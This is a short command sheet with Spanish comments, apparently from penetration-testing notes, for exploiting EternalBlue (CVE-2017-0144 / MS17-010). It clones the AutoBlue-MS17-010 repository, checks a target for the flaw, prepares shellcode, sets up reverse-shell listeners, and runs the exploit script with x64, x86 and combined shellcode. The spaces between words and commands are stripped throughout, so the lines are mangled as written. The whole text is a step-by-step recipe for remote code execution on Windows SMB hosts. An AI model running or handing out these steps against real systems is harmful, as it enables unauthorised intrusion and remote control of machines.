# Clonación de repositorio gitclonehttps://github.com/3ndG4me/AutoBlue-MS17-010.gitcdAutoBlue-MS17-010# Revisión si objetivo es vulnerable a EternalBlue (CVE-2017-0144 / MS17-010)python3eternal_checker.py<target># Generación de shellcodecdshellcode&&./shell_prep.sh# Configuración de listeners de reverse shellcd..&&./listener_prep.sh# Exploitpython3eternalblue_exploit7.py<target>./shellcode/sc_all.binpython3eternalblue_exploit7.py<target>./shellcode/sc_x64.binpython3eternalblue_exploit7.py<target>./shellcode/sc_x86.bin